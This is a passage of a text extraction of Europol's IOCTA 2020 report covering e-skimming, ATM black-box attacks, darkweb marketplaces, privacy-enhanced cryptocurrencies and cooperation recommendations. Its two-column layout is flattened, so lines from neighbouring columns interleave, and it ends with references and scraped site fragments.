losses, detection of e-skimming is often difficult. same browser settings and victim’s card credentials.
Merchants do not necessarily realise that they have After the fraud, many victims erase the evidence
been infected, as it is the card-issuing banks that themselves, following Windows security guidance to
notice the frauds first. Reporting back to the merchant restore to the last known configuration after having
does not always take place, especially if the bank been compromised by the botnet, effectively removing
and the merchant are in different countries, in which all traces of the intrusion. This use of botnets to
case it can be difficult to determine who is liable for bypass sophisticated fraud prevention tools reflects a
covering the losses: the bank or the merchant. In recurrent theme in the fight against cybercrime – as
addition to the difficulty of timely detection, there are security measures are heightened, criminals come up
currently no anticipated technological or legal drivers with novel ways to continue their illicit activities.
to deter criminal groups conducting Magecart-style
4.6 TERMINAL ATTACKS INCREASE AS POPULARITY

OF BLACK-BOX ATTACKS SOARS
Logical attacks on ATMs and POS devices remain cooperation in order to stop them. These criminal
a threat and have increased across most Member groups are often Russian-speaking and with links
States. Among these, especially black-box attacks to Eastern Europe, actively targeting ATMs across
have proven popular, as organised criminal groups Europe.
successfully manage to extract large amounts of
cash in short periods of time. Black-boxing involves Criminals are targeting mostly older ATM models, for
the installation of an external device connected to the which security measures and software have not been
cash dispenser in order to bypass the need for a card updated. While the modi operandi here remain largely
authorisation to dispense cash. Typically, the actual the same; with occasional developments taking place
installation of the black box requires little technical in accordance with improved ATM security measures,
knowledge besides the provision of the device and law enforcement agencies noticed some changes in
instructions. With cybercriminals remotely sending modi operandi over the past twelve months. As such,
instructions to jackpot the ATMs, itinerant criminal one Member State respondent saw a particularly
networks are able to operate across several locations ingenious criminal group using a new type of modus
in different countries within a few days, requiring operandi for each attack, including a malware to check
quick law enforcement response and international the balance of an ATM before deciding to attack it.
_54 IOCTA 2020 5
5
CRIME PRIORITY
The criminal abuse of

the darkweb
KEY FINDINGS
• The Darkweb environment • The nature of the enhanced cryptocurrencies
has remained volatile, Darkweb community at and an emergence of
lifecycles of Darkweb the administrator level privacy-enhanced coinjoin
market places have shows how adaptive concepts, such as Wasabi
shortened, and no clear it is under challenging and Samurai.
dominant market has times, including more
risen over the past year effective cooperation
• Surface web e-commerce
sites and encrypted
compared to previous in the search for better
communication platforms
years to fill the vacuum left security solutions and safe
offer an additional
by the 2019 takedowns. Darkweb interaction.
dimension to Darkweb
• There has been an increase trading to enhance the
in the use of privacy- overall business model.
The criminal abuse of the darkweb IOCTA 2020 _55
5.1 INTRODUCTION
In 2019 and early 2020 a high level of

volatility on the Darkweb was witnessed.
Following protective measures, which multiple
marketplaces have implemented, the situation
has calmed down considerably. Nevertheless,
the Darkweb environment remains difficult to
disrupt as developments are often challenging
to anticipate. This adds to the law enforcement
challenges with respect to this growing threat,
which continues to function as a key facilitator
for many other forms of crime.
_56 IOCTA 2020 The criminal abuse of the darkweb
5.2 MARKETPLACE DEVELOPMENTS
More marketplaces based on purchased scripts have DDoS protection solution (nicknamed Endgame Filter),
launched over the past twelve months, but some which is free to use for other marketplaces, therefore
of these disappeared due to hacking or exit scams. expanding their role beyond a traditional information
The decrease in large-scale marketplaces has led hub. Developers have also produced a Darkweb search
to an increase in smaller marketplaces, in some engine termed Recon, a service allowing users to
cases catering to specific users or needs. Some of see what kind of drugs are for sale on the Darkweb,
these markets are growing and as they gain positive what vendors there are and what ratings they have.
feedback from users, they are becoming increasingly Another example of a Darkweb search engine is Kilos,
stable. Users are monitoring ratings and usually which emerged in November 2019 reportedly as a
tend to keep to stable markets and vendors with potential follow up of Grams. Grams was a Darkweb
high ratings. The market community has engaged search engine which ceased operations in 201754.
in new ways of building trust with its users by Since going online Kilos seems to have adopted the
developing cross-cutting solutions on information objective of indexing more platforms and adding
and reliability. A new site called DarkNet Trust has more search functionalities than Grams. Moreover,
emerged which verifies vendors’ reputations by Digital Shadows describes how “Kilos has introduced
searching through usernames and PGP fingerprints updates, new features, and services that aim to ensure
and it is able to search over ten thousand profiles from security and anonymity for its users and also add a
marketplaces52. more human element to the site not previously seen
on other prominent Darkweb-based search engines."55
After the takedown of DeepDotWeb mentioned in
the IOCTA 201953, centralisation of information on Even though marketplaces continue to appear and
Darkweb markets has stabilised and even increased. disappear, an increasing number of operationally
DeepDotWeb was a popular information service secure marketplaces, such as wallet-less and user-
which made it easier for users to navigate the less markets, have emerged. Additionally, some
Darkweb ecosystem. Users are now looking to set up marketplaces have intentionally relatively short
information hubs to increase user-friendliness in the lifecycles, which pose a challenge to law enforcement
Darkweb environment and sites such as dark.fail and investigations. Short life cycles are making it difficult
darknetlive.com have taken over DeepDotWeb’s role for law enforcement to investigate criminal cases.
as information hubs. Dread, a popular Darkweb forum Administrators seem to want to stay under the radar
found on The Onion Router (Tor), continues to operate, of law enforcement by knocking down markets and
having been around for approximately three years. keeping market lifecycles low.
The administrators of Dread additionally produced a
The criminal abuse of the darkweb IOCTA 2020 _57
Darkweb child abuse: administrator authorities, US law enforcement authorities

of Darkscandals arrested in the and US Department of Justice and Europol in
Netherlands an operation to arrest the administrator and
takedown the DarkScandals website. The
Early in March 2020, Europol announced administrator, a Dutch national, had allegedly
the successful takedown of DarkScandals, received over 2 million dollars in exchange
a website which hosted videos of non- for selling the content on the website. The
consensual and violent sex videos, including offender was charged with several counts
elements of rape, torture, human trafficking of distribution of CSAM, production and
and CSE. The website had claimed it hosted transportation of obscene matters for sale
thousands of videos of this kind of footage or distribution, engaging in the business or
from all around the world. The Dutch law selling or transferring obscene matter, and
enforcement authorities and national laundering of money instruments59.
prosecutor’s office cooperated with German
5.3 ADMINISTRATORS AND USERS ADAPT AS THEY AIM

TO ENHANCE SECURITY AND RESILIENCE
Furthermore, Darkweb administrators have been and enacting no JavaScript policies. Monopoly is also
observed pulling together and showing a collaborative a wallet-less market in which payment occurs directly
spirit to maintain the environment under challenging between buyer and vendor, and instead of enacting
circumstances. When faced with similar challenges, transaction fees, the market receives a monthly
forum and service administrators have been seen commission. Marketplaces were observed using multi
working more closely together over sharing code and signature wallets in their transactions56.
security methodologies (i.e. anti-DDoS measures,
avoiding scams, creating trust-building sites to help Users have also opted to use safer communications
users navigate vendors across different marketplaces, methods. The reputation of Protonmail, an encrypted
etc.). The Darkweb is essentially shaping into a email service considered to be a former favourite
‘business sector’ in itself. There are also differences among Darkweb users57, has suffered after
in the way administrators conduct their business on accusations that it has been helping law enforcement.
the Darkweb. Some are presenting to have a moral Due to this, Darkweb users are shifting to new
compass, banning items relating to the COVID-19 emerging encrypted email services such as Sonar and
pandemic crisis, for example. This is not typical Elude58.
across the Darkweb, but it is an indication that some
In addition to encrypted email services, Darkweb
administrators differ in their approaches to conducting
users are relying increasingly on popular digital
illicit trade.
communication channels such as Discord, Wickr and
Administrators are also looking to upgrade their Telegram. As these offer some degree of anonymity
security apparatus with other new features. Some to the users, criminals consider it a safe place. This
marketplaces are already shifting to wallet-less and has introduced new initiatives, such as the Telegram
user-less markets, adopting multi signatures on vending service bot.
Bitcoin and Monero, lacking registration requirements
_58 IOCTA 2020 The criminal abuse of the darkweb
5.4 INFRASTRUCTURE PREFERENCES REMAIN STABLE,

BUT CRIMINALS DO USE ALTERNATIVES
In terms of the Darkweb infrastructure, Tor remains emerged on the platform over the past year. These
the preferred option. As a result, criminal usage of include those banned by some of the other Tor
Tor continues to be the primary focus. However, market-based administrators such as weapons
criminals have started to use other privacy-focused, and fentanyl. Even though the numbers may be
decentralised marketplace platforms, such as considered limited, the nature of these items means
OpenBazaar and Particl.io to sell their illegal goods. the focus ought to be on impact rather than volume.
The emergence of decentralised privacy-oriented COVID-19 related items also emerged on OpenBazaar
platforms is not a new phenomenon in the Darkweb during the pandemic. OpenBazaar has advertised a
ecosystem but they have started to increase mobile platform Haven and has seen thousands of
interest over the last year. OpenBazaar in particular downloads on Android60.
is noteworthy as certain high priority threats have
5.5 PRIVACY ENHANCING WALLETS EMERGE AS A TOP THREAT, AS

PRIVACY ENHANCING COINS GAIN POPULARITY
With respect to cryptocurrency on the Darkweb, Initially, Darkweb markets relied solely on Bitcoin.
privacy-enhanced wallet services using coinjoin However, over the past few years this has changed.
concepts (for example Wasabi and Samurai wallets) An increasing number of markets are recognising
have emerged as a top threat in addition to well the benefits of offering multiple coin alternatives,
established centralised mixers. Apart from expected including Litecoin, Ethereum, Monero, Zcash,
functionality including advanced decentralised coin and Dash. While Bitcoin still remains the most
mixing or integration of Tor these offer additional popular payment method (mainly due to its wide
features. Samurai, for example, offers remote wipe adoption, reputation and ease of use), the use of
SMS commands when under distress. These wallets privacy-enhanced cryptocurrencies has somewhat
do not necessarily remove the link between the origin increased albeit not at the rate expected by their
and destination of the funds but certainly make proponents. Monero is gradually becoming the most
cryptocurrency tracing much more challenging. Some established privacy coin for Darkweb transactions,
administrators of underground markets are trying to followed by Zcash and Dash. All these privacy
apply these wallets to their payment systems. Threat coins may present a considerable obstacle to law
actors have also been witnessed increasingly using enforcement investigations, despite the competing
hardware wallets, a separate physical device, which altcoin communities uncritically favouring their
securely store seeds and private keys for a wide range implementation over the others.
of cryptocurrencies.
_59
The criminal abuse
IOCTA of
2020 the darkweb The criminal abuse
IOCTA of _59
the darkweb
2020
5.6 SURFACE WEB PLATFORMS OFFER AN ADDITIONAL

DIMENSION TO DARKWEB TRADING
Some platforms existing on the clear web (or surface forum administrators including cracked.to and nulled.
web) are also catering Darkweb goods and services, to). Stores on the platform also offered stolen accounts,
which offers additional benefits for criminals’ business databases, carding, crypters, banking malware,
models. A number of cybercriminals are relying on ransomware and variants of the Mirai botnet. This
surface-level e-commerce platforms for increased platform allowed sellers to accept payments through
visibility, posting links to their online digital goods PayPal and cryptocurrencies61. Surface e-commerce
stores. One case involved an e-commerce platform sites are useful for cybercriminals, as they allow them
registered to a company based in the Middle East, to showcase their products and services and they are
hosting online stores selling malicious digital tools legitimately registered businesses. Law enforcement
from Arabic, Russian, and English language-based also found cybercrime tools available on other clear
underground forums (links were found to underground web sites.
5.7 STEADY SUPPLY OF DIVERSE DARKWEB MARKET ITEMS

There has been an increase in the provision of digital which makes it difficult to prioritise within the drug topic.
and cybercrime elements on the Darkweb. Personal Additionally, the COVID-19 pandemic crisis seemed to
data, access to compromised systems (e.g. through have the most effect on the supply chains regarding
RDP application), as well as services catering malware, drug trade compared to other crime. This has now
ransomware and DDoS attacks, are all elements stabilised and the situation has returned to normal, with
prevalent for the facilitation of cybercrime. Document an anticipated growth on the horizon.
and proof of identity services have also increased on
the Darkweb. Perpetrators generally use identity and Finally, the distribution of firearms has become
document services to support citizenship claims and significantly more fragmented. After the takedown
other applications, obtaining lines of credit to set up a of the Berlusconi marketplace by Italian law
business, open untraceable bank accounts, proof of enforcement, which used to be the go-to place for
residence, to commit insurance fraud, purchase illicit firearms on the Darkweb, firearms have emerged on
items and other uses. There has been a shift in the different marketplaces. Firearms are also available
offering of legitimate-looking counterfeit passports to on OpenBazaar, although the scale of supply is
“legal or registered” passports, which can pass several unconfirmed. Some shops are also selling firearms
authentication tests, with criminals offering registered from the United States. The ability for individuals
passport services. Trend Micro Inc. explains that the to purchase firearms on the Darkweb has become
increase of global immigrants and the increasing increasingly difficult, due to recent law enforcement
adoption of e-passports is a likely driver behind this successes in catching individuals purchasing firearms
trend62. Additionally, some Darkweb sites also promote illegally.
money laundering and instructions for users on how to
The diverse products and services vary in their level of
use cryptocurrencies for money laundering.
impact and their ability to facilitate more serious forms
Users can find drug listings in massive volume on the of crime. The supply of these goods on the Darkweb
Darkweb; however, these do not necessarily reach poses a significant threat in the EU. Furthermore, the
priority-levels in terms of impact. More impactful, geographic nature of the threat is also diversifying. The
dangerous drugs, such as fentanyl, opioids and heroin Hydra market – the largest darknet marketplace serving
are still significantly present on the Darkweb, although Russia and neighbouring countries – has recently
listings are smaller in number. Europol has observed advertised an impending publication of a new, secure
an increasing trend of top organised crime groups encrypted market platform, which they aim to open to
having a presence on the Darkweb dealing drugs, which the English-speaking community. Such a development
is likely due to an effort to expand their distribution would arguably make Darkweb investigations more
mechanisms. As noted in IOCTA 2019, drug dealers difficult for law enforcement in the future and poses a
may also be running multiple monikers on the Darkweb, significant threat to the EU.
_60 IOCTA 2020 Recommendations
Recommendations
Coordination and cooperation

remain critical
There is little doubt that cybercrime requires more

The following section consists effective cooperation between private and public
sector parties. Attackers use a coordinated approach
of highlights from this year’s and share infrastructure, which makes a broad and
cohesive response to the criminal developments even
Member State and partner more important. This also requires the engagement
of multiple levels of collaboration.
interviews combined with
More taskforce-like approaches, which has worked
Europol insights. The majority especially well in the Netherlands and the UK, would
be beneficial. Considering the global nature of the
of the responses resonated Darkweb ecosystem and cross-border interaction
of its users, the key recommendation is to establish
with previously reported a dedicated multinational Darkweb task force to
approach the problem. This would help address
recommendations focusing on legal jurisdiction challenges and obstacles hindering
coordination.
recurring themes, such as:
Pre-investigative actions and information sourcing
should be enabled with a dedicated centralised
approach in the EU. This would help identify
» coordination and cooperation; firstly priority cases and criminals, and secondly,
appropriate jurisdiction over cases and highlight
» information sharing the most efficient ways of cooperating over specific
(removing practical obstacles, enhance judicial cases and operations.
cooperation, reduce time, foster a culture of There is a persistent need for better cooperation
transparency and trust); with hosting services, social media platforms, and
ISPs. Companies need to be more proactive in illegal
» enhancing the legal framework; content and activity and blocking it as soon as they
detect it. One way of improving this is to invest in
» prevention and awareness; technologies that make sure their platforms are
clean. They should also be able to demonstrate more
» capacity building. willingness to assist law enforcement agencies to
deal with, for example, CSE, and show improved
openness and transparency.
Recommendations IOCTA 2020 _61
Information sharing becomes Prevention and awareness as well as

even more crucial to offer timely crisis management
response to cybercrime
As indicated in many parts of the IOCTA, criminals remain
successful because of inadequate cyber hygiene and an
Efficient and timely information gathering, analysing inability of victims to detect cybercriminal activities. This
and sharing is crucial for fighting cybercrime. To this inability often stems from a lack of awareness on the
end, information sharing should be harmonised (what side of the victim. This returns in many different forms of
information can be shared between parties) and crime, including social engineering and phishing, as well
institutionalised. Structured efforts need to be put as investment fraud. A lack of knowledge and awareness
into place, increasing trust among the parties sharing of the risk related to online CSE is also one of the drivers
information. behind the increase in online CSAM. This highlights the
need to continue promoting preventive and educational
We must develop a culture of acceptance and
initiatives in a coordinated and structural manner across
transparency, and incentives for victims to bring
Europe.
their incidents to light and not fear penalties and re-
victimisation for being targeted by cyber-attacks. In addition to raising awareness, there are calls for more
effort on improving general cyber preparedness, including
Considering the fast nature of cybercrime, it is
crisis management, exercises and disaster recovery plans.
important to make the exchange of information in light
This is a recommendation which Europol in cooperation
of international cooperation faster by implementing
with its partners has responded to through its efforts with
channels with, for example, the relevant ISPs at the
respect to the Law Enforcement Emergency Response
European level (VPN, anonymisers, anonymous email
Protocol (LE ERP). Developing evaluation schemes to
providers, cryptocurrency exchanges, etc.).
assess and test IT security with infrastructure and devices,
establishing rules and setting guidelines could increase
resilience against cybercrime.
Enhancing the legal framework

International law and national legislation should
be better aligned with investigation practices
in cybercrime. The link between legislation and
Capacity building
investigative practices requires more focus.
Cyber elements are becoming more and more visible
in other areas of criminality and increasing numbers of
There should be more relevant and focused legislation
these criminal activities are becoming cyber-enabled.
addressing bulletproof hosts and registrars, with
This trend requires increased capacity among law
which voluntary cooperation varies with law
enforcement to deal with this evolving challenge.
enforcement.
Integrating cyber elements into law enforcement
Darkweb threat actors increasing reliance on readiness already at the police academy level would
encrypted email services, privacy-enhanced enable educating and facilitating individuals who want to
cryptocurrencies and BPH providers pose a specialise in cybercrime. Effective investigations require
substantial problem to law enforcement. This calls for technical expertise (civilian) and experience in criminal
increased KYC type policies. cases (law enforcement). Every police force should be
responsible for developing knowledge within their units.
_62 IOCTA 2020 References
References
1 Durbin, Steve, “The Future’s Biggest Cybercrime 10 Europol, Catching the virus: cybercrime, disinforma-
Threat May Already Be Here”, https://www. tion and the COVID-19 pandemic, 2020
darkreading.com/vulnerabilities---threats/the-fu-
11 See IIJ America, “Allow / Deny List (Domain Policy
tures-biggest-cybercrime-threat-may-already-be-
Set Level)”, https://iijasd.zendesk.com/hc/en-us/
here/a/d-id/1338439, 2020
articles/206289805-Allow-Deny-List-Domain-Pol-
2 Europol, “Staying Safe During COVID-19: What you icy-Set-Level-, 2015 and the UK National Cyber
need to know”, https://www.europol.europa.eu/ Security Centre, “Terminology: it’s not black and
activities-services/staying-safe-during-covid-19- white”, https://www.ncsc.gov.uk/blog-post/termi-
what-you-need-to-know, 2020 nology-its-not-black-and-white, 2020
3 The European Union External Action Service 12 Chainalysis, “The Chainalysis Crypto Crime Report
(EEAS), “A Europe that Protects: Countering Hybrid is Here. Download to Learn Why 2019 Was the
Threats”, https://eeas.europa.eu/topics/eco- Year of the Ponzi Scheme”, https://blog.chainaly-
nomic-relations-connectivity-innovation/46393/ sis.com/reports/cryptocurrency-crime-2020-re-
europe-protects-countering-hybrid-threats_en port, 2020
accessed 27 July 2020 , 2020
13 Paquet-Clouston et al., “Spams meet Cryptocur-
4 Europol, Catching the virus: cybercrime, disinforma- rencies: Sextortion in the Bitcoin Ecosystem”,
tion and the COVID-19 pandemic, 2020 Advances in Financial Technology (AFT19), https://
arxiv.org/pdf/1908.01051.pdf , 2019
5 Wolford, Ben, “Does the GDPR apply to compa-
nies outside the EU?”, https://gdpr.eu/compa- 14 BBC, Coincheck: World’s biggest ever digital cur-
nies-outside-of-europe/, 2020 rency ‘theft’, https://www.bbc.com/news/world-
asia-42845505, 2018
6 Palmer, Danny, “GDPR: 160,000 data breaches
reported already, so expect the big fines to follow” 15 At the time of writing – August 2020.
https://www.zdnet.com/article/gdpr-160000-da-
16 European Commission, “February infringements
ta-breaches-reported-already-so-expect-the-big-
package: key decisions”, https://ec.europa.eu/
fines-to-follow/, 2020
commission/presscorner/detail/en/inf_20_202 ,
7 Schwab, Pierre-Nicolas, “European GDPR statis- 2020
tics: evolution of the number of complaints per
17 Coin ATM Radar, https://coinatmradar.com/, 2020
country”, https://www.intotheminds.com/blog/en/
gdpr-statistics-europe/ , 2019 18 European Commission, ”Protecting victims’
rights”, https://ec.europa.eu/info/policies/jus-
8 Verizon, 2020 Data Breach Investigations Report,
tice-and-fundamental-rights/criminal-justice/pro-
2020
tecting-victims-rights_en#:~:text=The%20Europe-
9 Many interviewees used the term sophistication an%20Commission%20presented%20on,fully%20
in connection to a variety of threats. The wide- rely%20on%20their%20rights, 2020
spread use of the term, however, also makes its
19 See for example https://twitter.com/EC3Europol
value as a descriptor limited. Certain sources aim
activities.
to further unravel the answer to what makes a
particular tactic or modus operandi sophisticated. 20 For more information see Europol and Eurojust’s
See DePaula, Nic & Sanjay Goel, “A Sophistica- reports on the Observatory Function.
tion Index for Evaluating Security Breaches”, 11th 21 Alrwais, Sumayah et al., Under the Shadow of Sun-
Annual Symposium on Information Assurance, 2016, sine: Understanding and Detecting Bulletproof Host-
and Buchanan, Ben, “The Legend of Sophistication ing on Legitimate Service Provider, IEEE Symposium
in Cyber Operations”, https://www.belfercenter. on Security and Privacy, 2017
org/publication/legend-sophistication-cyber-oper-
ations, 2017 22 State Criminal Police Office Rhineland-Palat-
References IOCTA 2020 _63
inate, https://www.presseportal.de/blaulicht/ en/programs-and-initiatives/survivors-survey/,

pm/29763/4387169, 2019 2017
23 Chainalysis, “Ransomware Attackers Aren’t 34 Europol, “Exploiting isolation: offenders and

Sparing Anyone During Covid-19”, https://blog. victims of online child sexual abuse during the
chainalysis.com/reports/ransomware-covid-19 COVID-19 pandemic”, https://www.europol.europa.
, 2020. Also see BBC News, “NHS ‘could have eu/publications-documents/exploiting-isola-
prevented’ WannaCry ransomware attack”, https:// tion-offenders-and-victims-of-online-child-sexu-
www.bbc.com/news/technology-41753022, 2017, al-abuse-during-covid-19-pandemic, 2020
and Winder, Davey, “Infection Hits French Hospi-
35 Canadian Centre for Child Protection, “Internation-
tal Like It’s 2017 As Ransomware Cripples 6,000
al Survivors’ Survey”, https://protectchildren.ca/
Computers”, https://www.forbes.com/sites/davey-
en/programs-and-initiatives/survivors-survey/,
winder/2019/11/20/infection-hits-french-hospital-
2017
like-its-2017-as-ransomware-cripples-6000-com-
puters/#5db5ae55576e, 2019 36 Europol, “Partners & Agreements – Police2Peer:
Targeting file sharing of child sexual abuse
24 Krebs, Brian, “REvil Ransomware Gang Starts
material”, https://www.europol.europa.eu/part-
Auctioning Victim Data”, https://krebsonsecurity.
ners-agreements/police2peer, 2020
com/2020/06/revil-ransomware-gang-starts-auc-
tioning-victim-data/, 2020 37 Europol, “Exploiting isolation: offenders and
victims of online child sexual abuse during the
25 Europol, Internet Organised Crime Threat Assess-
COVID-19 pandemic”, https://www.europol.europa.
ment (IOCTA) 2018, 2018
eu/publications-documents/exploiting-isola-
26 Krebs, Brian, “REvil Ransomware Gang Starts tion-offenders-and-victims-of-online-child-sexu-
Auctioning Victim Data”, https://krebsonsecurity. al-abuse-during-covid-19-pandemic, 2020
com/2020/06/revil-ransomware-gang-starts-auc-
38 BBC News, “NSPCC urges Facebook to stop
tioning-victim-data/, 2020
encryption plans”, https://www.bbc.com/news/
27 Goodin, Dan, “LockBit Is the New Ransomware for technology-51391301, 2020 and Musil, Steven,
Hire”, https://www.wired.com/story/lockbit-is-the- “Facebook urged to halt encryption push over
new-ransomware-for-hire/, 2020 child abuse concerns”, https://www.cnet.com/
news/facebook-urged-to-halt-encryption-push-
28 Virsec, “Maze & Other Ransomware Groups Say
over-child-abuse-concerns/, 2020
They Won’t Attack Hospitals During COVID-19
Outbreak-But How Trustworthy Is Their Word?”, 39 Europol, “International police cooperation leads
https://virsec.com/maze-and-other-ransomware- to arrest of Darkweb child sex abuser in Spain”,
groups-say-they-wont-attack-hospitals-during- https://www.europol.europa.eu/newsroom/news/
covid19-outbreak-but-how-trustworthy-is-their- international-police-cooperation-leads-to-arrest-of-
word/, 2020 dark-web-child-sex-abuser-in-spain, 2020
29 Hammersmith Medicines Research, “HMR target- 40 Europol, ”Operation CHEMOSH: how encrypted
ed by cyber criminals”, https://www.hmrlondon. chat groups exchanged Emoji ‘stickers’ of child
com/hmr-targeted-by-cyber-criminals, 2020 sexual abuse”, https://www.europol.europa.eu/
newsroom/news/operation-chemosh-how-en-
30 Intel 471, “Understanding the relationship between
crypted-chat-groups-exchanged-emoji-%E2%80%-
Emotet, Ryuk and Trickbot”, https://blog.intel471.
98stickers%E2%80%99-of-child-sexual-abuse,
com/2020/04/14/understanding-the-relation-
2020
ship-between-emotet-ryuk-and-trickbot/, 2020
41 Europol, “Exploiting isolation: offenders and
31 AWS Shield, ”Threat Landscape Report – Q1
victims of online child sexual abuse during the
2020”, https://aws-shield-tlr.s3.amazonaws.
COVID-19 pandemic”, https://www.europol.europa.
com/2020-Q1_AWS_Shield_TLR.pdf, 2020
eu/publications-documents/exploiting-isola-
32 European Commission, “Preventing and Combat- tion-offenders-and-victims-of-online-child-sexu-
ing Child Sexual Abuse and Exploitation: Towards al-abuse-during-covid-19-pandemic, 2020
an EU Response”, https://audiovisual.ec.europa.
42 Wongsamuth, Nanchanok, ”Online child sexual
eu/en/video/I-191928, 2020
abuse cases triple under lockdown in Philippines”,
33 Canadian Centre for Child Protection, “Internation- https://news.trust.org/item/20200529090040-
al Survivors’ Survey”, https://protectchildren.ca/ 3ejzo/ , 2020
_64 IOCTA 2020 References
43 Europol, ”90 suspects identified in major online 53 Europol, Internet Organised Crime Threat Assess-
child sexual abuse operation”, https://www. ment (IOCTA) 2019, 2019
europol.europa.eu/newsroom/news/90-sus-
54 Digital Shadows, ”Darkweb Search Engine Kilos:
pects-identified-in-major-online-child-sexu-
Tipping the Scales In Favor of Cybercrime”,
al-abuse-operation, 2020
https://www.digitalshadows.com/blog-and-re-
44 Europol, Internet Organised Crime Threat Assess- search/dark-web-search-engine-kilos/ , 2020
ment (IOCTA) 2019, 2019
55 Digital Shadows, ”Darkweb Search Engine Kilos:
45 Europol, ”COVID-19: Child Sexual Exploitation”, Tipping the Scales In Favor of Cybercrime”,
https://www.europol.europa.eu/covid-19/cov- https://www.digitalshadows.com/blog-and-re-
id-19-child-sexual-exploitation, 2020 search/dark-web-search-engine-kilos/ , 2020
46 Europol, ”COVID-19: Child Sexual Exploitation”, 56 Fuentes, Mayra Rosario, “Shifts in Underground
https://www.europol.europa.eu/covid-19/cov- Markets: Past, Present, and Future”, 2020
id-19-child-sexual-exploitation, 2020
57 Fuentes, Mayra Rosario, “Shifts in Underground
47 Europol, “The SIM hijackers: How criminals are Markets: Past, Present, and Future”, 2020
stealing millions by highjacking phone numbers”,
https://www.europol.europa.eu/newsroom/news/
Markets: Past, Present, and Future”, 2020
sim-highjackers-how-criminals-are-stealing-mil-
lions-highjacking-phone-numbers, 2020 59 Europol, ”Darkweb child abuse: administrator
of Darkscandals arrested in the Netherlands”,
48 Europol, “The SIM hijackers: How criminals are
stealing millions by highjacking phone numbers”,
dark-web-child-abuse-administrator-of-darkscan-
dals-arrested-in-netherlands, 2020
sim-highjackers-how-criminals-are-stealing-mil-
lions-highjacking-phone-numbers, 2020 60 Europol, Catching the virus: cybercrime, disinforma-
tion and the COVID-19 pandemic, 2020
49 Cimpanu, Catalin, “FBI: BEC scams accounted for
half of the cyber-crime losses in 2019”, https:// 61 Fuentes, Mayra Rosario, “Shifts in Underground
www.zdnet.com/article/fbi-bec-scams-accounted- Markets: Past, Present, and Future”, 2020
for-half-of-the-cyber-crime-losses-in-2019/, 2020. 62 Fuentes, Mayra Rosario, “Shifts in Underground
50 Stupp, Catherine, “Fraudsters Used AI to Mim- Markets: Past, Present, and Future”, 2020
ic CEO’s Voice in Unusual Cybercrime Case”,
https://www.wsj.com/articles/fraudsters-use-
ai-to-mimic-ceos-voice-in-unusual-cybercrime-
case-11567157402, 2019
51 Krebs, Brian, “Wawa Breach May Have Compro-

mised More Than 30 Million Payment Cards”,
https://krebsonsecurity.com/tag/jokers-stash/,
2020

Markets: Past, Present, and Future”, 2020

Internet Organised Crime Threat Assessment Iocta 2020 PDF

Uploaded by

Copyright:

Available Formats

Internet Organised Crime Threat Assessment Iocta 2020 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Internet Organised Crime Threat Assessment Iocta 2020 PDF

Uploaded by

Copyright:

Available Formats

What are some of the main cybercrime threats discussed in the document?

What are some of the main cybercrime threats discussed in the document?

How has COVID-19 impacted cybercriminal behavior according to the document?

How has COVID-19 impacted cybercriminal behavior according to the document?

_2 IOCTA 2020 ﻿

© European Union Agency for Law Enforcement Cooperation 2020.

Reproduction is authorised provided the source is acknowledged. For any use or

Foreword 04 Abbreviations 05 Executive summary 06

Key findings 08 Introduction 10

1 Cross-cutting crime facilitators and

2.2 Ransomware 5.2 Marketplace developments

2.3 Malware 5.3 Administrators and users adapt as they aim

Cybercrime affects citizens, businesses and organisations across the

AaaS Access-as-a-Service ISP Internet service provider

AI Artificial Intelligence IT Information technology

ATM Automated teller machine J-CAT Joint Cybercrime Action Taskforce

BEC Business email compromise KYC Know your customer

BPH Bulletproof hosting LDCA Live distant child abuse

CaaS Cybercrime-as-a-Service MaaS Malware-as-a-Service

IoT Internet of Things 2FA Two-factor authentication

IP Internet protocol

CROSS-CUTTING CRIME CYBER-DEPENDENT CRIME

» Social engineering remains a top threat to » Ransomware on third-party providers also

CHILD SEXUAL EXPLOITATION ONLINE

PAYMENT FRAUD THE CRIMINAL ABUSE OF THE

Aim editions, the team shared a survey with all the

Cybercrime is inherently complex for a number of

For this year’s IOCTA, Europol introduced a different

• Social engineering remains • Cryptocurrencies • Challenges with reporting

Throughout the interviews, one message was clear: cybercrime

1.2 COVID-19 DEMONSTRATES CRIMINAL OPPORTUNISM

FOR BUSINESSES FOR EMPLOYEES

1.3 DATA COMPROMISE

BREAK THE CHAIN

SPOT THE FAKE

In addition to employing a targeted approach,

The hackers created a sophisticated script

Here, criminals have also been reported to make

1.4 CRYPTOCURRENCIES FACILITATE PAYMENT

conducting the first international law enforcement

aside, the bitcoin protocol itself is expected to soon

Cybercriminals will increasingly turn to marketplaces

Several interviewees indicated how they are unable

blame on the victim, which harms

1.6 LAW ENFORCEMENT ACCESS TO DATA CONTINUES

Encryption continues to become a mainstream

An important building block of the criminal

• Ransomware remains the • Ransomware on third-party • Emotet is omnipresent

The clear majority of law enforcement

Fig. 1 A screenshot of a data auctioning session online26.

Ransomware TIPS & ADVICE

THE MALWARE THAT HOLDS YOUR

HOW DOES IT SPREAD?

Visiting compromised Clicking on malicious

Downloading fake Connecting infected external

Besides ransomware, European law enforcement

Malware attacks have been targeting

In one case, a private sector respondent reported

Emotet is highly professional and aggressive as

_2 IOCTA 2020